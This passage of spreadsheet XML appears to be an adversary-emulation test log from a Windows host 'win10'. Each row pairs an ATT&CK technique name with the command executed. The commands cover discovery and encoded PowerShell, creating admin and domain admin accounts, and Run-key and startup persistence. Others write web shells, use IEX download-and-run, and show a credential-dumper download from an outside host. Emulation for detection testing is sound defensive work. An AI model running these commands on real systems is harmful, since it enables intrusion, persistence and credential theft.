          </cell>
        </row>
        <row r="32">
          <cell r="A32" t="str">
            <v>System Owner/User Discovery</v>
          </cell>
          <cell r="B32" t="str">
            <v>2022-11-30T18:08:31Z</v>
          </cell>
          <cell r="C32" t="str">
            <v>System Owner/User Discovery</v>
          </cell>
          <cell r="D32" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E32" t="str">
            <v>win10</v>
          </cell>
          <cell r="F32">
            <v>7660</v>
          </cell>
          <cell r="G32" t="str">
            <v>cmd.exe /C whoami &amp;&amp; wmic useraccount get /ALL &amp;&amp; quser /SERVER:"localhost" &amp;&amp; quser &amp;&amp; qwinsta.exe /server:localhost &amp;&amp; qwinsta.exe &amp;&amp; for /F "tokens=1</v>
          </cell>
        </row>
        <row r="33">
          <cell r="A33" t="str">
            <v>Find System Network Connections</v>
          </cell>
          <cell r="B33" t="str">
            <v>2022-11-30T18:08:51Z</v>
          </cell>
          <cell r="C33" t="str">
            <v>Find System Network Connections</v>
          </cell>
          <cell r="D33" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E33" t="str">
            <v>win10</v>
          </cell>
          <cell r="F33">
            <v>1392</v>
          </cell>
          <cell r="G33" t="str">
            <v>netstat -anto;Get-NetTCPConnection</v>
          </cell>
        </row>
        <row r="34">
          <cell r="A34" t="str">
            <v>System Network Connections Discovery</v>
          </cell>
          <cell r="B34" t="str">
            <v>2022-11-30T18:09:36Z</v>
          </cell>
          <cell r="C34" t="str">
            <v>System Network Connections Discovery</v>
          </cell>
          <cell r="D34" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E34" t="str">
            <v>win10</v>
          </cell>
          <cell r="F34">
            <v>4404</v>
          </cell>
          <cell r="G34" t="str">
            <v>netstat &amp;&amp; net use &amp;&amp; net sessions</v>
          </cell>
        </row>
        <row r="35">
          <cell r="A35" t="str">
            <v>Query Registry</v>
          </cell>
          <cell r="B35" t="str">
            <v>2022-11-30T18:11:02Z</v>
          </cell>
          <cell r="C35" t="str">
            <v>Query Registry</v>
          </cell>
          <cell r="D35" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E35" t="str">
            <v>win10</v>
          </cell>
          <cell r="F35">
            <v>4504</v>
          </cell>
          <cell r="G35" t="str">
            <v>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices &amp;&amp; reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" &amp;&amp; reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" &amp;&amp; reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" &amp;&amp; reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" &amp;&amp; reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run &amp;&amp; reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2&gt;nul | findstr /Ri ".*\.sys$" &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run</v>
          </cell>
        </row>
        <row r="36">
          <cell r="A36" t="str">
            <v>List Windows Firewall Rules</v>
          </cell>
          <cell r="B36" t="str">
            <v>2022-11-30T18:11:57Z</v>
          </cell>
          <cell r="C36" t="str">
            <v>List Windows Firewall Rules</v>
          </cell>
          <cell r="D36" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E36" t="str">
            <v>win10</v>
          </cell>
          <cell r="F36">
            <v>6668</v>
          </cell>
          <cell r="G36" t="str">
            <v>netsh advfirewall firewall show rule name=all</v>
          </cell>
        </row>
        <row r="37">
          <cell r="A37" t="str">
            <v>Network Interface Configuration</v>
          </cell>
          <cell r="B37" t="str">
            <v>2022-11-30T18:12:52Z</v>
          </cell>
          <cell r="C37" t="str">
            <v>Network Interface Configuration</v>
          </cell>
          <cell r="D37" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E37" t="str">
            <v>win10</v>
          </cell>
          <cell r="F37">
            <v>5980</v>
          </cell>
          <cell r="G37" t="str">
            <v>ipconfig</v>
          </cell>
        </row>
        <row r="38">
          <cell r="A38" t="str">
            <v>Process Discovery - get-wmiObject</v>
          </cell>
          <cell r="B38" t="str">
            <v>2022-11-30T18:13:52Z</v>
          </cell>
          <cell r="C38" t="str">
            <v>Process Discovery - get-wmiObject</v>
          </cell>
          <cell r="D38" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E38" t="str">
            <v>win10</v>
          </cell>
          <cell r="F38">
            <v>2396</v>
          </cell>
          <cell r="G38" t="str">
            <v>get-wmiObject -class Win32_Process</v>
          </cell>
        </row>
        <row r="39">
          <cell r="A39" t="str">
            <v>PowerShell Process Enumeration</v>
          </cell>
          <cell r="B39" t="str">
            <v>2022-11-30T18:14:27Z</v>
          </cell>
          <cell r="C39" t="str">
            <v>PowerShell Process Enumeration</v>
          </cell>
          <cell r="D39" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E39" t="str">
            <v>win10</v>
          </cell>
          <cell r="F39">
            <v>7864</v>
          </cell>
          <cell r="G39" t="str">
            <v>get-process &gt;&gt; $env:APPDATA\vmtools.log;cat $env:APPDATA\vmtools.log</v>
          </cell>
        </row>
        <row r="40">
          <cell r="A40" t="str">
            <v>Process Discovery - tasklist</v>
          </cell>
          <cell r="B40" t="str">
            <v>2022-11-30T18:15:02Z</v>
          </cell>
          <cell r="C40" t="str">
            <v>Process Discovery - tasklist</v>
          </cell>
          <cell r="D40" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E40" t="str">
            <v>win10</v>
          </cell>
          <cell r="F40">
            <v>6252</v>
          </cell>
          <cell r="G40" t="str">
            <v>tasklist</v>
          </cell>
        </row>
        <row r="41">
          <cell r="A41" t="str">
            <v>Network Share Discovery command prompt</v>
          </cell>
          <cell r="B41" t="str">
            <v>2022-11-30T18:16:02Z</v>
          </cell>
          <cell r="C41" t="str">
            <v>Network Share Discovery command prompt</v>
          </cell>
          <cell r="D41" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E41" t="str">
            <v>win10</v>
          </cell>
          <cell r="F41">
            <v>1392</v>
          </cell>
          <cell r="G41" t="str">
            <v>net view \\localhost</v>
          </cell>
        </row>
        <row r="42">
          <cell r="A42" t="str">
            <v>Network Share Discovery PowerShell</v>
          </cell>
          <cell r="B42" t="str">
            <v>2022-11-30T18:16:52Z</v>
          </cell>
          <cell r="C42" t="str">
            <v>Network Share Discovery PowerShell</v>
          </cell>
          <cell r="D42" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E42" t="str">
            <v>win10</v>
          </cell>
          <cell r="F42">
            <v>7868</v>
          </cell>
          <cell r="G42" t="str">
            <v>get-smbshare</v>
          </cell>
        </row>
        <row r="43">
          <cell r="A43" t="str">
            <v>Discover system services</v>
          </cell>
          <cell r="B43" t="str">
            <v>2022-11-30T18:17:58Z</v>
          </cell>
          <cell r="C43" t="str">
            <v>Discover system services</v>
          </cell>
          <cell r="D43" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E43" t="str">
            <v>win10</v>
          </cell>
          <cell r="F43">
            <v>4840</v>
          </cell>
          <cell r="G43" t="str">
            <v>Get-Service</v>
          </cell>
        </row>
        <row r="44">
          <cell r="A44" t="str">
            <v>Permission Groups Discovery PowerShell (Local)</v>
          </cell>
          <cell r="B44" t="str">
            <v>2022-11-30T18:18:43Z</v>
          </cell>
          <cell r="C44" t="str">
            <v>Permission Groups Discovery PowerShell (Local)</v>
          </cell>
          <cell r="D44" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E44" t="str">
            <v>win10</v>
          </cell>
          <cell r="F44">
            <v>8040</v>
          </cell>
          <cell r="G44" t="str">
            <v>Get-LocalGroup; Get-LocalGroupMember -Name "Administrators";([ADSI]"WinNT://./Administrators").psbase.Invoke('Members') | % {([ADSI]$_).InvokeGet('AdsPath')}</v>
          </cell>
        </row>
        <row r="45">
          <cell r="A45" t="str">
            <v>Permission Groups Discovery</v>
          </cell>
          <cell r="B45" t="str">
            <v>2022-11-30T18:19:33Z</v>
          </cell>
          <cell r="C45" t="str">
            <v>Permission Groups Discovery</v>
          </cell>
          <cell r="D45" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E45" t="str">
            <v>win10</v>
          </cell>
          <cell r="F45">
            <v>2840</v>
          </cell>
          <cell r="G45" t="str">
            <v>gpresult /R</v>
          </cell>
        </row>
        <row r="46">
          <cell r="A46" t="str">
            <v>List Directory</v>
          </cell>
          <cell r="B46" t="str">
            <v>2022-11-30T18:20:18Z</v>
          </cell>
          <cell r="C46" t="str">
            <v>List Directory</v>
          </cell>
          <cell r="D46" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E46" t="str">
            <v>win10</v>
          </cell>
          <cell r="F46">
            <v>2992</v>
          </cell>
          <cell r="G46" t="str">
            <v>dir</v>
          </cell>
        </row>
        <row r="47">
          <cell r="A47" t="str">
            <v>Enumerate all accounts (Domain)</v>
          </cell>
          <cell r="B47" t="str">
            <v>2022-11-30T18:21:13Z</v>
          </cell>
          <cell r="C47" t="str">
            <v>Enumerate all accounts (Domain)</v>
          </cell>
          <cell r="D47" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E47" t="str">
            <v>win10</v>
          </cell>
          <cell r="F47">
            <v>6312</v>
          </cell>
          <cell r="G47" t="str">
            <v>net user /domain &amp;&amp; net group /domain</v>
          </cell>
        </row>
        <row r="48">
          <cell r="A48" t="str">
            <v>Account Discovery (all)</v>
          </cell>
          <cell r="B48" t="str">
            <v>2022-11-30T18:22:08Z</v>
          </cell>
          <cell r="C48" t="str">
            <v>Account Discovery (all)</v>
          </cell>
          <cell r="D48" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E48" t="str">
            <v>win10</v>
          </cell>
          <cell r="F48">
            <v>5320</v>
          </cell>
          <cell r="G48" t="str">
            <v>net user /domain</v>
          </cell>
        </row>
        <row r="49">
          <cell r="A49" t="str">
            <v>Enumerate all accounts on Windows (Local)</v>
          </cell>
          <cell r="B49" t="str">
            <v>2022-11-30T18:22:43Z</v>
          </cell>
          <cell r="C49" t="str">
            <v>Enumerate all accounts on Windows (Local)</v>
          </cell>
          <cell r="D49" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E49" t="str">
            <v>win10</v>
          </cell>
          <cell r="F49">
            <v>7336</v>
          </cell>
          <cell r="G49" t="str">
            <v>net user &amp;&amp; dir c:\Users\ &amp;&amp; cmdkey.exe /list &amp;&amp; net localgroup "Users" &amp;&amp; net localgroup</v>
          </cell>
        </row>
        <row r="50">
          <cell r="A50" t="str">
            <v>Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)</v>
          </cell>
          <cell r="B50" t="str">
            <v>2022-11-30T18:23:38Z</v>
          </cell>
          <cell r="C50" t="str">
            <v>Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)</v>
          </cell>
          <cell r="D50" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E50" t="str">
            <v>win10</v>
          </cell>
          <cell r="F50">
            <v>704</v>
          </cell>
          <cell r="G50" t="str">
            <v>$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Manufacturer"; $Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Model"; if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}</v>
          </cell>
        </row>
        <row r="51">
          <cell r="A51" t="str">
            <v>Detect Virtualization Environment (Windows)</v>
          </cell>
          <cell r="B51" t="str">
            <v>2022-11-30T18:24:29Z</v>
          </cell>
          <cell r="C51" t="str">
            <v>Detect Virtualization Environment (Windows)</v>
          </cell>
          <cell r="D51" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E51" t="str">
            <v>win10</v>
          </cell>
          <cell r="F51">
            <v>4740</v>
          </cell>
          <cell r="G51" t="str">
            <v>$error.clear(); Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue; if($error) {echo "Virtualization Environment detected"}</v>
          </cell>
        </row>
        <row r="52">
          <cell r="A52" t="str">
            <v>Applications Installed</v>
          </cell>
          <cell r="B52" t="str">
            <v>2022-11-30T18:25:24Z</v>
          </cell>
          <cell r="C52" t="str">
            <v>Applications Installed</v>
          </cell>
          <cell r="D52" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E52" t="str">
            <v>win10</v>
          </cell>
          <cell r="F52">
            <v>7452</v>
          </cell>
          <cell r="G52" t="str">
            <v>Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName</v>
          </cell>
        </row>
        <row r="53">
          <cell r="A53" t="str">
            <v>Discover antivirus programs</v>
          </cell>
          <cell r="B53" t="str">
            <v>2022-11-30T18:25:59Z</v>
          </cell>
          <cell r="C53" t="str">
            <v>Discover antivirus programs</v>
          </cell>
          <cell r="D53" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E53" t="str">
            <v>win10</v>
          </cell>
          <cell r="F53">
            <v>2680</v>
          </cell>
          <cell r="G53" t="str">
            <v>wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value</v>
          </cell>
        </row>
        <row r="54">
          <cell r="A54" t="str">
            <v>GetDomain</v>
          </cell>
          <cell r="B54" t="str">
            <v>2022-11-30T18:26:59Z</v>
          </cell>
          <cell r="C54" t="str">
            <v>GetDomain</v>
          </cell>
          <cell r="D54" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E54" t="str">
            <v>win10</v>
          </cell>
          <cell r="F54">
            <v>8152</v>
          </cell>
          <cell r="G54" t="str">
            <v>Import-Module .\powerview.ps1 -Force;Get-NetDomain | ConvertTo-Json -Depth 1</v>
          </cell>
        </row>
        <row r="55">
          <cell r="A55" t="str">
            <v>Display group policy information via gpresult</v>
          </cell>
          <cell r="B55" t="str">
            <v>2022-11-30T18:27:59Z</v>
          </cell>
          <cell r="C55" t="str">
            <v>Display group policy information via gpresult</v>
          </cell>
          <cell r="D55" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E55" t="str">
            <v>win10</v>
          </cell>
          <cell r="F55">
            <v>7604</v>
          </cell>
          <cell r="G55" t="str">
            <v>gpresult /z</v>
          </cell>
        </row>
        <row r="56">
          <cell r="A56" t="str">
            <v>Examine domain password policy - Windows</v>
          </cell>
          <cell r="B56" t="str">
            <v>2022-11-30T18:28:59Z</v>
          </cell>
          <cell r="C56" t="str">
            <v>Examine domain password policy - Windows</v>
          </cell>
          <cell r="D56" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E56" t="str">
            <v>win10</v>
          </cell>
          <cell r="F56">
            <v>7560</v>
          </cell>
          <cell r="G56" t="str">
            <v>net accounts /domain</v>
          </cell>
        </row>
        <row r="57">
          <cell r="A57" t="str">
            <v>Examine local password policy - Windows</v>
          </cell>
          <cell r="B57" t="str">
            <v>2022-11-30T18:29:44Z</v>
          </cell>
          <cell r="C57" t="str">
            <v>Examine local password policy - Windows</v>
          </cell>
          <cell r="D57" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E57" t="str">
            <v>win10</v>
          </cell>
          <cell r="F57">
            <v>7764</v>
          </cell>
          <cell r="G57" t="str">
            <v>net accounts</v>
          </cell>
        </row>
        <row r="58">
          <cell r="A58" t="str">
            <v>Create a Process using WMI Query and an Encoded Command</v>
          </cell>
          <cell r="B58" t="str">
            <v>2022-11-30T18:30:45Z</v>
          </cell>
          <cell r="C58" t="str">
            <v>Create a Process using WMI Query and an Encoded Command</v>
          </cell>
          <cell r="D58" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E58" t="str">
            <v>win10</v>
          </cell>
          <cell r="F58">
            <v>1328</v>
          </cell>
          <cell r="G58" t="str">
            <v>powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA</v>
          </cell>
        </row>
        <row r="59">
          <cell r="A59" t="str">
            <v>Scheduled task Local</v>
          </cell>
          <cell r="B59" t="str">
            <v>2022-11-30T18:31:35Z</v>
          </cell>
          <cell r="C59" t="str">
            <v>Scheduled task Local</v>
          </cell>
          <cell r="D59" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E59" t="str">
            <v>win10</v>
          </cell>
          <cell r="F59">
            <v>3588</v>
          </cell>
          <cell r="G59" t="str">
            <v>SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10</v>
          </cell>
        </row>
        <row r="60">
          <cell r="A60" t="str">
            <v>Encoded VBS code execution</v>
          </cell>
          <cell r="B60" t="str">
            <v>2022-11-30T18:32:25Z</v>
          </cell>
          <cell r="C60" t="str">
            <v>Encoded VBS code execution</v>
          </cell>
          <cell r="D60" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E60" t="str">
            <v>win10</v>
          </cell>
          <cell r="F60">
            <v>2544</v>
          </cell>
          <cell r="G60" t="str">
            <v>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing); Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"</v>
          </cell>
        </row>
        <row r="61">
          <cell r="A61" t="str">
            <v>Suspicious Execution via Windows Command Shell</v>
          </cell>
          <cell r="B61" t="str">
            <v>2022-11-30T18:33:10Z</v>
          </cell>
          <cell r="C61" t="str">
            <v>Suspicious Execution via Windows Command Shell</v>
          </cell>
          <cell r="D61" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E61" t="str">
            <v>win10</v>
          </cell>
          <cell r="F61">
            <v>7752</v>
          </cell>
          <cell r="G61" t="str">
            <v>%LOCALAPPDATA:~-3</v>
          </cell>
        </row>
        <row r="62">
          <cell r="A62" t="str">
            <v>Execute PowerShell script via Word DDE</v>
          </cell>
          <cell r="B62" t="str">
            <v>2022-11-30T18:34:05Z</v>
          </cell>
          <cell r="C62" t="str">
            <v>Execute PowerShell script via Word DDE</v>
          </cell>
          <cell r="D62" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E62" t="str">
            <v>win10</v>
          </cell>
          <cell r="F62">
            <v>3484</v>
          </cell>
          <cell r="G62" t="str">
            <v>start 0a4081_DDE_Document.docx</v>
          </cell>
        </row>
        <row r="63">
          <cell r="A63" t="str">
            <v>ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments</v>
          </cell>
          <cell r="B63" t="str">
            <v>2022-11-30T18:34:40Z</v>
          </cell>
          <cell r="C63" t="str">
            <v>ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments</v>
          </cell>
          <cell r="D63" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E63" t="str">
            <v>win10</v>
          </cell>
          <cell r="F63">
            <v>6256</v>
          </cell>
          <cell r="G63" t="str">
            <v>$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable; if (-not $RequiredModule) {Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force};  ;  Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop</v>
          </cell>
        </row>
        <row r="64">
          <cell r="A64" t="str">
            <v>Execute a Command as a Service</v>
          </cell>
          <cell r="B64" t="str">
            <v>2022-11-30T18:35:35Z</v>
          </cell>
          <cell r="C64" t="str">
            <v>Execute a Command as a Service</v>
          </cell>
          <cell r="D64" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E64" t="str">
            <v>win10</v>
          </cell>
          <cell r="F64">
            <v>3608</v>
          </cell>
          <cell r="G64" t="str">
            <v>sc.exe create ARTService binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt" &amp;&amp; sc.exe start ARTService &amp;&amp; sc.exe delete ARTService</v>
          </cell>
        </row>
        <row r="65">
          <cell r="A65" t="str">
            <v>Create a new Windows admin user</v>
          </cell>
          <cell r="B65" t="str">
            <v>2022-11-30T18:36:40Z</v>
          </cell>
          <cell r="C65" t="str">
            <v>Create a new Windows admin user</v>
          </cell>
          <cell r="D65" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E65" t="str">
            <v>win10</v>
          </cell>
          <cell r="F65">
            <v>6424</v>
          </cell>
          <cell r="G65" t="str">
            <v>net user /add "T1136.001_Admin" "T1136_pass" &amp;&amp; net localgroup administrators "T1136.001_Admin" /add</v>
          </cell>
        </row>
        <row r="66">
          <cell r="A66" t="str">
            <v>Create a new Windows domain admin user</v>
          </cell>
          <cell r="B66" t="str">
            <v>2022-11-30T18:37:16Z</v>
          </cell>
          <cell r="C66" t="str">
            <v>Create a new Windows domain admin user</v>
          </cell>
          <cell r="D66" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E66" t="str">
            <v>win10</v>
          </cell>
          <cell r="F66">
            <v>7428</v>
          </cell>
          <cell r="G66" t="str">
            <v>net user "T1136.002_Admin" "T1136_pass123!" /add /domain &amp;&amp; net group "Domain Admins" "#T1136.002_Admin" /add /domain</v>
          </cell>
        </row>
        <row r="67">
          <cell r="A67" t="str">
            <v>Web Shell Written to Disk</v>
          </cell>
          <cell r="B67" t="str">
            <v>2022-11-30T18:37:56Z</v>
          </cell>
          <cell r="C67" t="str">
            <v>Web Shell Written to Disk</v>
          </cell>
          <cell r="D67" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E67" t="str">
            <v>win10</v>
          </cell>
          <cell r="F67">
            <v>7984</v>
          </cell>
          <cell r="G67" t="str">
            <v>New-Item -Type Directory PathToAtomicsFolder\T1505.003\src -ErrorAction ignore | Out-Null;Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\b.jsp";Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\tests.jsp";Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "PathToAtomicsFolder\T1505.003\src\cmd.aspx";xcopy /I /Y PathToAtomicsFolder\T1505.003\src C:\inetpub\wwwroot</v>
          </cell>
        </row>
        <row r="68">
          <cell r="A68" t="str">
            <v>Service Installation CMD</v>
          </cell>
          <cell r="B68" t="str">
            <v>2022-11-30T18:38:51Z</v>
          </cell>
          <cell r="C68" t="str">
            <v>Service Installation CMD</v>
          </cell>
          <cell r="D68" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E68" t="str">
            <v>win10</v>
          </cell>
          <cell r="F68">
            <v>7156</v>
          </cell>
          <cell r="G68" t="str">
            <v>New-Item -Type Directory (split-path PathToAtomicsFolder\T1543.003\bin\AtomicService.exe) -ErrorAction ignore | Out-Null;Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe";sc.exe create AtomicTestService_CMD binPath=PathToAtomicsFolder\T1543.003\bin\AtomicService.exe;sc.exe start AtomicTestService_CMD</v>
          </cell>
        </row>
        <row r="69">
          <cell r="A69" t="str">
            <v>Netsh Helper DLL Registration</v>
          </cell>
          <cell r="B69" t="str">
            <v>2022-11-30T18:39:56Z</v>
          </cell>
          <cell r="C69" t="str">
            <v>Netsh Helper DLL Registration</v>
          </cell>
          <cell r="D69" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E69" t="str">
            <v>win10</v>
          </cell>
          <cell r="F69">
            <v>6336</v>
          </cell>
          <cell r="G69" t="str">
            <v>netsh.exe add helper 08497f_NetshHelper.dll &amp;&amp; taskkill /im notepad.exe /t /f &gt; NUL 2&gt;&amp;1</v>
          </cell>
        </row>
        <row r="70">
          <cell r="A70" t="str">
            <v>Add Executable Shortcut Link to User Startup Folder</v>
          </cell>
          <cell r="B70" t="str">
            <v>2022-11-30T18:40:51Z</v>
          </cell>
          <cell r="C70" t="str">
            <v>Add Executable Shortcut Link to User Startup Folder</v>
          </cell>
          <cell r="D70" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E70" t="str">
            <v>win10</v>
          </cell>
          <cell r="F70">
            <v>6232</v>
          </cell>
          <cell r="G70" t="str">
            <v>$Target = "C:\Windows\System32\calc.exe"; $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"; $WScriptShell = New-Object -ComObject WScript.Shell; $Create = $WScriptShell.CreateShortcut($ShortcutLocation); $Create.TargetPath = $Target; $Create.Save()</v>
          </cell>
        </row>
        <row r="71">
          <cell r="A71" t="str">
            <v>Inject Cred dumper into process (Spookier)</v>
          </cell>
          <cell r="B71" t="str">
            <v>2022-11-30T18:41:52Z</v>
          </cell>
          <cell r="C71" t="str">
            <v>Inject Cred dumper into process (Spookier)</v>
          </cell>
          <cell r="D71" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E71" t="str">
            <v>win10</v>
          </cell>
          <cell r="F71">
            <v>892</v>
          </cell>
          <cell r="G71" t="str">
            <v>$url="http://192.168.15.5:8888/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("file"</v>
          </cell>
        </row>
        <row r="72">
          <cell r="A72" t="str">
            <v>Access Token Manipulation</v>
          </cell>
          <cell r="B72" t="str">
            <v>2022-11-30T18:43:07Z</v>
          </cell>
          <cell r="C72" t="str">
            <v>Access Token Manipulation</v>
          </cell>
          <cell r="D72" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E72" t="str">
            <v>win10</v>
          </cell>
          <cell r="F72">
            <v>6336</v>
          </cell>
          <cell r="G72" t="str">
            <v>New-Item -Type Directory (split-path PathToAtomicsFolder\T1134.002\src\GetToken.ps1) -ErrorAction ignore | Out-Null;Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/src/GetToken.ps1" -OutFile "PathToAtomicsFolder\T1134.002\src\GetToken.ps1";Set-ExecutionPolicy -Scope Process Bypass -Force; $owners = @{}; gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}; Get-Process | Select ProcessName</v>
          </cell>
        </row>
        <row r="73">
          <cell r="A73" t="str">
            <v>Deadman - Delete agent file</v>
          </cell>
          <cell r="B73" t="str">
            <v>2022-11-30T18:43:57Z</v>
          </cell>
          <cell r="C73" t="str">
            <v>Deadman - Delete agent file</v>
          </cell>
          <cell r="D73" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E73" t="str">
            <v>win10</v>
          </cell>
          <cell r="F73">
            <v>436</v>
          </cell>
          <cell r="G73" t="str">
            <v>$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;$processClass = Get-CimClass -ClassName Win32_Process;Invoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{    Commandline = 'cmd.exe /c "timeout /nobreak /t 10 &gt;nul 2&gt;nul &amp; del /f C:\Users\Public\splunkd.exe"';    ProcessStartupInformation = [CimInstance]$startupInfo};</v>
          </cell>
        </row>
        <row r="74">
          <cell r="A74" t="str">
            <v>Modify Registry of Local Machine - cmd</v>
          </cell>
          <cell r="B74" t="str">
            <v>2022-11-30T18:44:32Z</v>
          </cell>
          <cell r="C74" t="str">
            <v>Modify Registry of Local Machine - cmd</v>
          </cell>
          <cell r="D74" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E74" t="str">
            <v>win10</v>
          </cell>
          <cell r="F74">
            <v>4368</v>
          </cell>
          <cell r="G74" t="str">
            <v>reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d calc.exe /f</v>
          </cell>
        </row>
        <row r="75">
          <cell r="A75" t="str">
            <v>Deobfuscate/Decode Files Or Information</v>
          </cell>
          <cell r="B75" t="str">
            <v>2022-11-30T18:45:37Z</v>
          </cell>
          <cell r="C75" t="str">
            <v>Deobfuscate/Decode Files Or Information</v>
          </cell>
          <cell r="D75" t="str">
